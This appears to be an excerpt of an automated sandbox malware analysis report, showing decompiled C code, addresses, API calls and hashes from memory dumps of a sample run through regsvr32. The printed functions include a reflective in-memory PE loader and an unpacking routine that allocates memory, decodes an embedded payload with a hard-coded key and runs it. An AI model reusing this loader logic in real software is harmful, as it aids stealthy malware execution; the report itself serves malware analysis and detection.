0x040ef6a2
0x040ef6ab
0x040ef6bf
0x040ef6c4
0x040ef6c7
0x00000000
0x040ef6c7
0x040ef57e
0x040ef760
0x040ef778
0x040ef782
0x040ef782
0x040ef786
0x040ef78f
0x040ef78f
0x040ef584
0x040ef58a
0x040ef590
0x040ef59c
0x040ef5a0
0x040ef5b4
0x040ef5cb
0x040ef5d9
0x040ef5ef
0x040ef5f7
0x040ef5fd
0x040ef602
0x040ef602
0x040ef752
0x040ef758
0x00000000
0x00000000
0x00000000
0x040ef75e
0x040ef74b
0x040ef74d
0x00000000

Strings

yWS, xrefs: 040EF2CD
t[, xrefs: 040EF01B
HA^, xrefs: 040EF126
<T, xrefs: 040EF137
_s, xrefs: 040EF2E2
y!Nt, xrefs: 040EF2C2
7b>, xrefs: 040EF4D8
(@, xrefs: 040EF11B
|t, xrefs: 040EF1F8
yY, xrefs: 040EF270

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: |t$(@$7b>$<T$HA^$_s$t[$y!Nt$yWS$yY
API String ID: 0-3414766599
Opcode ID: 1633111547b9da0c310fd7cf1deb30f4a19e4144ebbe6dba202b63130682f241
Instruction ID: f9ea4d5bcbde3de1545ffffaa16c9840333e4ec659b6c14de8fbc12a836bb3bf
Opcode Fuzzy Hash: 1633111547b9da0c310fd7cf1deb30f4a19e4144ebbe6dba202b63130682f241
Instruction Fuzzy Hash: BE021272508381DFD3A8CF21C48AA5BBBE1FBC5318F10890DE2D996260D7B59959CF43

Uniqueness

Uniqueness Score: -1.00%

Function 040E85FF, Relevance: 5.1, Strings: 4, Instructions: 142
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 65%

			E040E85FF(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v76;
				char _v80;
				char _v148;
				void* _t125;
				void* _t141;
				signed int _t148;
				signed int _t149;
				intOrPtr _t165;
				char _t166;

				_t165 = _a4;
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_t165);
				_push(__edx);
				_push(__ecx);
				E040EFE29(_t125);
				_v56 = _v56 & 0x00000000;
				_v64 = 0x4c8eee;
				_v60 = 0xd08445;
				_v12 = 0x2b5b52;
				_v12 = _v12 << 0xa;
				_v12 = _v12 ^ 0x243df932;
				_t148 = 0x1b;
				_v12 = _v12 / _t148;
				_v12 = _v12 ^ 0x0511db29;
				_v32 = 0x4cbd6f;
				_v32 = _v32 >> 0xd;
				_v32 = _v32 << 0x10;
				_v32 = _v32 ^ 0x02619ccd;
				_v8 = 0x229cdc;
				_v8 = _v8 ^ 0x1dfe7fc6;
				_v8 = _v8 + 0x780d;
				_v8 = _v8 >> 1;
				_v8 = _v8 ^ 0x0ee175b3;
				_v40 = 0x8e82d1;
				_v40 = _v40 + 0xffffcc21;
				_t149 = 0x39;
				_v40 = _v40 * 0x69;
				_v40 = _v40 ^ 0x3a51eacf;
				_v20 = 0xb8087c;
				_v20 = _v20 * 0x23;
				_v20 = _v20 >> 5;
				_v20 = _v20 ^ 0x00c96169;
				_v24 = 0x5c9964;
				_v24 = _v24 / _t149;
				_v24 = _v24 >> 7;
				_v24 = _v24 ^ 0x00085b7f;
				_v36 = 0xf34403;
				_v36 = _v36 * 0x6a;
				_v36 = _v36 | 0x7504e0f6;
				_v36 = _v36 ^ 0x75b6ad40;
				_v28 = 0x74a083;
				_v28 = _v28 * 0x7e;
				_v28 = _v28 >> 6;
				_v28 = _v28 ^ 0x00e859e6;
				_v48 = 0x5be020;
				_v48 = _v48 << 3;
				_v48 = _v48 ^ 0x02dd1a4a;
				_v44 = 0xfc2deb;
				_v44 = _v44 + 0x1b3b;
				_v44 = _v44 ^ 0x00f2ef0d;
				_v52 = 0x7de099;
				_v52 = _v52 ^ 0xb346769d;
				_v52 = _v52 ^ 0xb330844a;
				_v16 = 0x4076ee;
				_v16 = _v16 * 0xa;
				_v16 = _v16 * 0x14;
				_v16 = _v16 << 7;
				_v16 = _v16 ^ 0x2e751909;
				_t150 = _v12;
				_push( &_v148);
				_t166 = 0x44;
				_push(_t166);
				E040EFE2A(_v12, _v32);
				_v148 = _t166;
				_t141 = E040F2C24(_a8, _v8, _v12, _t150, _v40, _t150, _v20, _a20, _v24,  &_v148, _t150, _v36, _v28, _t150, _a12,  &_v80); // executed
				if(_t141 == 0) {
					return 0;
				}
				if(_t165 == 0) {
					E040F1538(_v48, _v44, _v80);
					E040F1538(_v52, _v16, _v76);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				return 1;
			}

0x040e860a
0x040e860d
0x040e860f
0x040e8612
0x040e8615
0x040e8618
0x040e861b
0x040e861e
0x040e861f
0x040e8620
0x040e8621
0x040e8626
0x040e862c
0x040e8633
0x040e863a
0x040e8641
0x040e8645
0x040e8651
0x040e8656
0x040e865b
0x040e8662
0x040e8669
0x040e866d
0x040e8671
0x040e8678
0x040e867f
0x040e8686
0x040e868d
0x040e8690
0x040e8697
0x040e869e
0x040e86a9
0x040e86aa
0x040e86ad
0x040e86b4
0x040e86bf
0x040e86c2
0x040e86c6
0x040e86cd
0x040e86d9
0x040e86dc
0x040e86e0
0x040e86e7
0x040e86f2
0x040e86f5
0x040e86fc
0x040e8703
0x040e870e
0x040e8711
0x040e8715
0x040e871c
0x040e8723
0x040e8727
0x040e872e
0x040e8735
0x040e873c
0x040e8743
0x040e874a
0x040e8751
0x040e8758
0x040e8763
0x040e876a
0x040e8773
0x040e8777
0x040e8781
0x040e8784
0x040e8787
0x040e8788
0x040e8789
0x040e8791
0x040e87c2
0x040e87cc
0x00000000
0x040e87fe
0x040e87d0
0x040e87e7
0x040e87f5
0x040e87d2
0x040e87d5
0x040e87d6
0x040e87d7
0x040e87d8
0x040e87d8
0x00000000

Strings

Y, xrefs: 040E8715
[, xrefs: 040E871C
v@, xrefs: 040E8758
R[+, xrefs: 040E863A

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: [$R[+$Y$v@
API String ID: 963392458-1276245682
Opcode ID: efe08f301ab2b251a86e33dfee0dd2d26676926c88cc055a74a7a241cd428695
Instruction ID: 800dea65ce8d13756e750c66ed30fb0792e470d16aab78885ac23133fdc3e00a
Opcode Fuzzy Hash: efe08f301ab2b251a86e33dfee0dd2d26676926c88cc055a74a7a241cd428695
Instruction Fuzzy Hash: A2613472C00209EFCF08DFE1D94A9EEBBB5FB48304F108159E911BA250D7B56A55CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 10002900, Relevance: 22.8, APIs: 15, Instructions: 331
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E10002900(intOrPtr __ecx, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* _v8;
				void* _v12;
				signed short* _v16;
				void* _v20;
				void* _v24;
				long _v28;
				signed int _v32;
				intOrPtr _v64;
				char _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr* _v80;
				intOrPtr _v84;
				void* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				void* _t180;
				void* _t191;
				void* _t198;
				void* _t202;
				intOrPtr _t209;
				void* _t220;
				intOrPtr _t269;
				intOrPtr _t278;
				intOrPtr _t326;

				_v100 = __ecx;
				_v72 = 0;
				_v20 = 0;
				if(E10001FE0(_v100, _a8, 0x40) != 0) {
					_v16 = _a4;
					if(( *_v16 & 0x0000ffff) == 0x5a4d) {
						_t10 =  &(_v16[0x1e]); // 0x47e81005
						if(E10001FE0(_v100, _a8,  *_t10 + 0xf8) != 0) {
							_t15 =  &(_v16[0x1e]); // 0x47e81005
							_v80 = _a4 +  *_t15;
							if( *_v80 == 0x4550) {
								if(( *(_v80 + 4) & 0x0000ffff) == 0x14c) {
									if(( *(_v80 + 0x38) & 0x00000001) == 0) {
										_v84 = _v80 + ( *(_v80 + 0x14) & 0x0000ffff) + 0x18;
										_v32 =  *(_v80 + 0x38);
										_v12 = 0;
										while(_v12 < ( *(_v80 + 6) & 0x0000ffff)) {
											if( *((intOrPtr*)(_v84 + 0x10)) != 0) {
												_v88 =  *((intOrPtr*)(_v84 + 0xc)) +  *((intOrPtr*)(_v84 + 0x10));
											} else {
												_v88 =  *((intOrPtr*)(_v84 + 0xc)) + _v32;
											}
											if(_v88 > _v20) {
												_v20 = _v88;
											}
											_v12 = _v12 + 1;
											_v84 = _v84 + 0x28;
										}
										__imp__GetNativeSystemInfo( &_v68); // executed
										_v28 =  *((intOrPtr*)(_v80 + 0x50)) + _v64 - 0x00000001 &  !(_v64 - 1);
										_t65 = _v64 - 1; // -1
										if(_v28 == (_v20 + _t65 &  !(_v64 - 1))) {
											_t180 = VirtualAlloc( *(_v80 + 0x34), _v28, 0x3000, 4); // executed
											_v24 = _t180;
											if(_v24 != 0) {
												L26:
												_v72 = HeapAlloc(GetProcessHeap(), 8, 0x34);
												if(_v72 != 0) {
													 *((intOrPtr*)(_v72 + 4)) = _v24;
													asm("sbb edx, edx");
													 *(_v72 + 0x14) =  ~( ~( *(_v80 + 0x16) & 0x2000));
													 *((intOrPtr*)(_v72 + 0x1c)) = _a12;
													 *((intOrPtr*)(_v72 + 0x20)) = _a16;
													 *((intOrPtr*)(_v72 + 0x24)) = _a20;
													 *((intOrPtr*)(_v72 + 0x28)) = _a24;
													 *((intOrPtr*)(_v72 + 0x30)) = _v64;
													if(E10001FE0(_v100, _a8,  *(_v80 + 0x54)) != 0) {
														_t191 = VirtualAlloc(_v24,  *(_v80 + 0x54), 0x1000, 4); // executed
														_v8 = _t191;
														E10001E60(_v8, _v16,  *(_v80 + 0x54));
														_t115 =  &(_v16[0x1e]); // 0x47e81005
														 *_v72 = _v8 +  *_t115;
														 *((intOrPtr*)( *_v72 + 0x34)) = _v24;
														_t198 = E10002010(_v100, _a4, _a8, _v80, _v72); // executed
														if(_t198 != 0) {
															_t269 =  *((intOrPtr*)( *_v72 + 0x34)) -  *(_v80 + 0x34);
															_v76 = _t269;
															if(_t269 == 0) {
																 *((intOrPtr*)(_v72 + 0x18)) = 1;
															} else {
																 *((intOrPtr*)(_v72 + 0x18)) = E10002500(_v100, _v72, _v76);
															}
															if(E10002670(_v100, _v72) != 0) {
																_t202 = E10002300(_v100, _v72); // executed
																if(_t202 != 0) {
																	if(E10002480(_v100, _v72) != 0) {
																		if( *((intOrPtr*)( *_v72 + 0x28)) == 0) {
																			 *(_v72 + 0x2c) = 0;
																			L49:
																			return _v72;
																		}
																		if( *(_v72 + 0x14) == 0) {
																			 *(_v72 + 0x2c) = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
																			L47:
																			goto L49;
																		}
																		_v96 = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
																		_t209 =  *0x10058ed8; // 0x0
																		_t278 =  *0x10058ed4; // 0x1
																		_t326 =  *0x10058ed0; // 0x10000000
																		_v92 = _v96(_t326, _t278, _t209);
																		if(_v92 != 0) {
																			 *((intOrPtr*)(_v72 + 0x10)) = 1;
																			goto L47;
																		}
																		SetLastError(0x45a);
																		L50:
																		E10002EC0(_v100, _v72);
																		return 0;
																	}
																	goto L50;
																}
																goto L50;
															}
															goto L50;
														}
														goto L50;
													}
													goto L50;
												}
												VirtualFree(_v24, 0, 0x8000);
												SetLastError(0xe);
												return 0;
											}
											_t220 = VirtualAlloc(0, _v28, 0x3000, 4); // executed
											_v24 = _t220;
											if(_v24 != 0) {
												goto L26;
											}
											SetLastError(0xe);
											return 0;
										}
										SetLastError(0xc1);
										return 0;
									}
									SetLastError(0xc1);
									return 0;
								}
								SetLastError(0xc1);
								return 0;
							}
							SetLastError(0xc1);
							return 0;
						}
						return 0;
					}
					SetLastError(0xc1);
					return 0;
				}
				return 0;
			}

0x10002906
0x10002909
0x10002910
0x10002927
0x10002933
0x10002941
0x10002958
0x10002970
0x1000297f
0x10002982
0x1000298e
0x100029af
0x100029cc
0x100029ee
0x100029f7
0x100029fa
0x10002a15
0x10002a28
0x10002a44
0x10002a2a
0x10002a33
0x10002a33
0x10002a4d
0x10002a52
0x10002a52
0x10002a09
0x10002a12
0x10002a12
0x10002a5b
0x10002a78
0x10002a81
0x10002a92
0x10002ab8
0x10002abe
0x10002ac5
0x10002af2
0x10002b03
0x10002b0a
0x10002b32
0x10002b44
0x10002b4b
0x10002b54
0x10002b5d
0x10002b66
0x10002b6f
0x10002b78
0x10002b90
0x10002bae
0x10002bb4
0x10002bc6
0x10002bd4
0x10002bda
0x10002be4
0x10002bfa
0x10002c01
0x10002c18
0x10002c1b
0x10002c1e
0x10002c3b
0x10002c20
0x10002c33
0x10002c33
0x10002c50
0x10002c63
0x10002c6a
0x10002c84
0x10002c96
0x10002d00
0x10002d07
0x00000000
0x10002d07
0x10002c9f
0x10002cf8
0x10002cfb
0x00000000
0x10002cfb
0x10002cac
0x10002caf
0x10002cb5
0x10002cbc
0x10002cc6
0x10002ccd
0x10002ce1
0x00000000
0x10002ce1
0x10002cd4
0x10002d0c
0x10002d13
0x00000000
0x10002d18
0x00000000
0x10002c86
0x00000000
0x10002c6c
0x00000000
0x10002c52
0x00000000
0x10002c03
0x00000000
0x10002b92
0x10002b17
0x10002b1f
0x00000000
0x10002b25
0x10002ad4
0x10002ada
0x10002ae1
0x00000000
0x00000000
0x10002ae5
0x00000000
0x10002aeb
0x10002a99
0x00000000
0x10002a9f
0x100029d3
0x00000000
0x100029d9
0x100029b6
0x00000000
0x100029bc
0x10002995
0x00000000
0x1000299b
0x00000000
0x10002972
0x10002948
0x00000000
0x1000294e
0x00000000

APIs

Part of subcall function 10001FE0: SetLastError.KERNEL32(0000000D,?,?,10002925,10008AC6,00000040), ref: 10001FF1

SetLastError.KERNEL32(000000C1,10008AC6,00000040), ref: 10002948

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 08cff93c7344199116f568f774659ccae89e30fc42bc807c3f2613e3b5310ed8
Instruction ID: 2ef2df373ea658209f5af2a718a6df98ca9e1c1927523c70ceffa034f4820264
Opcode Fuzzy Hash: 08cff93c7344199116f568f774659ccae89e30fc42bc807c3f2613e3b5310ed8
Instruction Fuzzy Hash: 01E1F874A01219EFEB04CF94C994E9EB7B2FF88384F208559E905AB399D770AD46CF50

Uniqueness

Uniqueness Score: -1.00%

Function 100088E0, Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 131
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E100088E0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HWND__* _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct HWND__* _v28;
				struct HWND__* _v32;
				long _v36;
				int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				void* __ebp;
				void* _t38;
				long _t45;
				long _t47;
				intOrPtr _t56;
				void* _t63;
				intOrPtr _t68;

				_t79 = __esi;
				_t78 = __edi;
				_t64 = __ebx;
				_v56 = _a8;
				 *0x10058ed0 = _a4;
				_t72 = _a8;
				 *0x10058ed4 = _a8;
				 *0x10058ed8 = _a12;
				_v8 = 0;
				_v36 = 0;
				_v28 = 0;
				_v32 = 0;
				_v12 = 0;
				_t38 = E10008860(__eflags); // executed
				if(_t38 != 0) {
					_push(0x10029b4c);
					E1001771B(__ebx, _t72, __edi, __esi, __eflags);
					return 0;
				}
				 *0x10056f08 = 0;
				 *0x10056f0c = 0;
				 *0x10056f10 = 0;
				 *0x10056f18 = 0;
				 *0x10056f14 = 0;
				_v40 = 0x44368d;
				_v52 = 0x3f8fc5;
				_v20 = 0x3b272b;
				_v24 = 0x2feb60;
				_v44 = 0xdd3c;
				_v48 = 0x47c;
				_v36 = 0x24e00;
				_v28 = E10006170(L"kernel32.dll");
				_v32 = E10006170(L"ntdll.dll");
				 *0x10058eb0 = E10006D50(_v28, 0x70e66e6b);
				 *0x10058eb8 = E10006D50(_v28, 0x579606ae);
				_t95 =  *0x10058eb8;
				if( *0x10058eb8 == 0) {
					_t45 = E10017716(0x10029b18);
					_t47 = E10017716("8192") | 0x00001000;
					__eflags = _t47;
					_v12 = VirtualAlloc(0, _v36, _t47, _t45);
				} else {
					_t63 =  *0x10058eb8(0xffffffff, 0, _v36, E10017716("8192") | 0x00001000, E10017716(0x10029b18), 0); // executed
					_v12 = _t63;
				}
				E10016A10(_t64, _t78, _t79, _v12, 0x10032098, _v36);
				_t68 =  *0x10056f04; // 0x730f
				_v16 = E1001703B(_t64, _v36, _t78, _t79, _t68);
				E10002FA0(_t95, _v16, "vzyxQQjtnPpM1kMtP2^c)toAOgGzJnA(x4n)mZV?Zgqbqls>&28Kb303hUncVaad@?N*A%W2eBhDNd+m_Bl2cFznqh*vrDpHPGj%?_!pbLp", 0x6c);
				E10004F00(_v16, _v12, _v36);
				_t56 = E10002D20(0x10058ebc, _v12, _v36); // executed
				 *0x10058edc = _t56;
				ShowWindow(0, _v40);
				return 1;
			}

0x100088e0
0x100088e0
0x100088e0
0x100088e9
0x100088ef
0x100088f5
0x100088f8
0x10008901
0x10008906
0x1000890d
0x10008914
0x1000891b
0x10008922
0x10008929
0x10008930
0x10008966
0x1000896b
0x00000000
0x10008973
0x10008932
0x1000893c
0x10008946
0x10008950
0x1000895a
0x1000897a
0x10008981
0x10008988
0x1000898f
0x10008996
0x1000899d
0x100089a4
0x100089b8
0x100089c8
0x100089dc
0x100089f2
0x100089f7
0x100089fe
0x10008a3b
0x10008a51
0x10008a51
0x10008a63
0x10008a00
0x10008a2b
0x10008a31
0x10008a31
0x10008a73
0x10008a7b
0x10008a8a
0x10008a98
0x10008aac
0x10008ac1
0x10008ac6
0x10008ad1
0x00000000

APIs

Part of subcall function 10008860: _malloc.LIBCMT ref: 1000886B

_printf.LIBCMT ref: 1000896B
VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00024E00,00000000,00000000,00000000), ref: 10008A2B
VirtualAlloc.KERNEL32(00000000,00024E00,00000000,00000000), ref: 10008A5D
_malloc.LIBCMT ref: 10008A82
ShowWindow.USER32(00000000,0044368D,00000000,00024E00), ref: 10008AD1

Strings

vzyxQQjtnPpM1kMtP2^c)toAOgGzJnA(x4n)mZV?Zgqbqls>&28Kb303hUncVaad@?N*A%W2eBhDNd+m_Bl2cFznqh*vrDpHPGj%?_!pbLp, xrefs: 10008A8F
+';, xrefs: 10008988
`/, xrefs: 1000898F
8192, xrefs: 10008A10, 10008A44
ntdll.dll, xrefs: 100089BB
kernel32.dll, xrefs: 100089AB

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocVirtual_malloc$NumaShowWindow_printf
String ID: +';$8192$`/$kernel32.dll$ntdll.dll$vzyxQQjtnPpM1kMtP2^c)toAOgGzJnA(x4n)mZV?Zgqbqls>&28Kb303hUncVaad@?N*A%W2eBhDNd+m_Bl2cFznqh*vrDpHPGj%?_!pbLp
API String ID: 1487653210-3670691644
Opcode ID: 230bbdfcd20e835c4d7365e9bc9cc9309c602f396e76a36ffbf0d77b2387037d
Instruction ID: 74e036033439e47f0f6271ee42a165f027743cdfe4c2c4d01037afcb8f86e406
Opcode Fuzzy Hash: 230bbdfcd20e835c4d7365e9bc9cc9309c602f396e76a36ffbf0d77b2387037d
Instruction Fuzzy Hash: FE5141F5D00214AFEB00CF90EC96BAE77B4FB48344F144528E909BB345E775A6448BA2

Uniqueness

Uniqueness Score: -1.00%

Function 10013A9B, Relevance: 16.6, APIs: 11, Instructions: 103
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E10013A9B() {
				struct _CRITICAL_SECTION* _v4;
				char _v28;
				char _v36;
				char _v44;
				intOrPtr _v56;
				void* __ebx;
				intOrPtr __ecx;
				signed int __edi;
				void* __esi;
				void* __ebp;
				struct _CRITICAL_SECTION* _t39;
				intOrPtr _t40;
				void* _t41;
				long _t44;
				void* _t45;
				signed int* _t51;
				intOrPtr _t64;
				long _t68;
				void* _t69;
				void* _t70;
				signed int _t72;
				intOrPtr _t78;
				signed int _t82;
				void* _t86;
				signed int _t88;
				void* _t90;
				void* _t91;
				void* _t93;

				_push(_t72);
				_push(_t69);
				_push(_t88);
				_t86 = _t72;
				_t1 = _t86 + 0x1c; // 0x1005aaa8
				_t39 = _t1;
				_v4 = _t39;
				EnterCriticalSection(_t39);
				_t3 = _t86 + 4; // 0x20
				_t40 =  *_t3;
				_t4 = _t86 + 8; // 0x3
				_t82 =  *_t4;
				if(_t82 >= _t40) {
					L7:
					_t82 = 1;
					__eflags = _t40 - 1;
					if(_t40 <= 1) {
						L12:
						_t21 = _t40 + 0x20; // 0x40
						_t88 = _t21;
						_t22 = _t86 + 0x10; // 0x2725680
						_t41 =  *_t22;
						__eflags = _t41;
						if(__eflags != 0) {
							_t69 = GlobalHandle(_t41);
							GlobalUnlock(_t69);
							_t44 = E100134F9(_t72, __eflags, _t88, 8);
							_t72 = 0x2002;
							_t45 = GlobalReAlloc(_t69, _t44, ??);
						} else {
							_t68 = E100134F9(_t72, __eflags, _t88, 8);
							_pop(_t72);
							_t45 = GlobalAlloc(2, _t68); // executed
						}
						__eflags = _t45;
						if(_t45 != 0) {
							_t70 = GlobalLock(_t45);
							_t25 = _t86 + 4; // 0x20
							__eflags = _t88 -  *_t25 << 3;
							E100174D0(_t82, _t70 +  *_t25 * 8, 0, _t88 -  *_t25 << 3);
							 *(_t86 + 4) = _t88;
							 *(_t86 + 0x10) = _t70;
							goto L20;
						} else {
							_t23 = _t86 + 0x10; // 0x2725680
							_t86 =  *_t23;
							__eflags = _t86;
							if(_t86 != 0) {
								GlobalLock(GlobalHandle(_t86));
							}
							LeaveCriticalSection(_v4);
							_push(_t88);
							_t90 = _t93;
							_push(_t72);
							_v28 = 0x10057168;
							E10017C83( &_v28, 0x1002e258);
							asm("int3");
							_push(_t90);
							_t91 = _t93;
							_push(_t72);
							_v36 = 0x10057200;
							E10017C83( &_v36, 0x1002e2b8);
							asm("int3");
							_push(_t91);
							_push(_t72);
							_v44 = 0x10057298;
							E10017C83( &_v44, 0x1002e2fc);
							asm("int3");
							_push(4);
							E10017BC1(E10027DEC, _t69, _t82, _t86);
							_t78 = E10013965(0x104);
							_v56 = _t78;
							_t64 = 0;
							_v44 = 0;
							if(_t78 != 0) {
								_t64 = E1000CF71(_t78);
							}
							return E10017C60(_t64);
						}
					} else {
						_t18 = _t86 + 0x10; // 0x2725680
						_t72 =  *_t18 + 8;
						__eflags = _t72;
						while(1) {
							__eflags =  *_t72 & 0x00000001;
							if(( *_t72 & 0x00000001) == 0) {
								break;
							}
							_t82 = _t82 + 1;
							_t72 = _t72 + 8;
							__eflags = _t82 - _t40;
							if(_t82 < _t40) {
								continue;
							}
							break;
						}
						__eflags = _t82 - _t40;
						if(_t82 < _t40) {
							goto L20;
						} else {
							goto L12;
						}
					}
				} else {
					_t13 = __esi + 0x10; // 0x2725680
					__ecx =  *_t13;
					__eflags =  *(__ecx + __edi * 8) & 0x00000001;
					if(( *(__ecx + __edi * 8) & 0x00000001) == 0) {
						L20:
						_t30 = _t86 + 0xc; // 0x3
						__eflags = _t82 -  *_t30;
						if(_t82 >=  *_t30) {
							_t31 = _t82 + 1; // 0x4
							 *((intOrPtr*)(_t86 + 0xc)) = _t31;
						}
						_t33 = _t86 + 0x10; // 0x2725680
						_t51 =  *_t33 + _t82 * 8;
						 *_t51 =  *_t51 | 0x00000001;
						__eflags =  *_t51;
						_t37 = _t82 + 1; // 0x4
						 *(_t86 + 8) = _t37;
						LeaveCriticalSection(_v4);
						return _t82;
					} else {
						goto L7;
					}
				}
			}

0x10013a9b
0x10013a9c
0x10013a9d
0x10013a9f
0x10013aa1
0x10013aa1
0x10013aa6
0x10013aaa
0x10013ab0
0x10013ab0
0x10013ab3
0x10013ab3
0x10013ab8
0x10013ac7
0x10013ac9
0x10013aca
0x10013acc
0x10013ae9
0x10013ae9
0x10013ae9
0x10013aec
0x10013aec
0x10013aef
0x10013af1
0x10013b0f
0x10013b12
0x10013b20
0x10013b26
0x10013b29
0x10013af3
0x10013af6
0x10013afc
0x10013b00
0x10013b00
0x10013b2f
0x10013b31
0x10013b5e
0x10013b60
0x10013b67
0x10013b71
0x10013b79
0x10013b7c
0x00000000
0x10013b33
0x10013b33
0x10013b33
0x10013b36
0x10013b38
0x10013b42
0x10013b42
0x10013b4c
0x1000a0a7
0x1000a0a8
0x1000a0aa
0x1000a0b4
0x1000a0bb
0x1000a0c0
0x1000a0c1
0x1000a0c2
0x1000a0c4
0x1000a0ce
0x1000a0d5
0x1000a0da
0x1000a0db
0x1000a0de
0x1000a0e8
0x1000a0ef
0x1000a0f4
0x1000a0f5
0x1000a0fc
0x1000a10b
0x1000a10d
0x1000a110
0x1000a114
0x1000a117
0x1000a119
0x1000a119
0x1000a123
0x1000a123
0x10013ace
0x10013ace
0x10013ad1
0x10013ad1
0x10013ad4
0x10013ad4
0x10013ad7
0x00000000
0x00000000
0x10013ad9
0x10013ada
0x10013add
0x10013adf
0x00000000
0x00000000
0x00000000
0x10013adf
0x10013ae1
0x10013ae3
0x00000000
0x00000000
0x00000000
0x00000000
0x10013ae3
0x10013aba
0x10013aba
0x10013aba
0x10013abd
0x10013ac1
0x10013b7f
0x10013b7f
0x10013b7f
0x10013b82
0x10013b84
0x10013b87
0x10013b87
0x10013b8a
0x10013b91
0x10013b94
0x10013b94
0x10013b97
0x10013b9a
0x10013b9d
0x10013baa
0x00000000
0x00000000
0x00000000
0x10013ac1

APIs

EnterCriticalSection.KERNEL32(1005AAA8,?,?,?,?,1005AA8C,10013DEC,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004), ref: 10013AAA
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,1005AA8C,10013DEC,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10013B00
GlobalHandle.KERNEL32(02725680), ref: 10013B09
GlobalUnlock.KERNEL32(00000000,?,?,?,?,1005AA8C,10013DEC,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004), ref: 10013B12
GlobalReAlloc.KERNEL32 ref: 10013B29
GlobalHandle.KERNEL32(02725680), ref: 10013B3B
GlobalLock.KERNEL32 ref: 10013B42
LeaveCriticalSection.KERNEL32(?,?,?,?,?,1005AA8C,10013DEC,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004), ref: 10013B4C
GlobalLock.KERNEL32 ref: 10013B58
_memset.LIBCMT ref: 10013B71
LeaveCriticalSection.KERNEL32(?), ref: 10013B9D

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
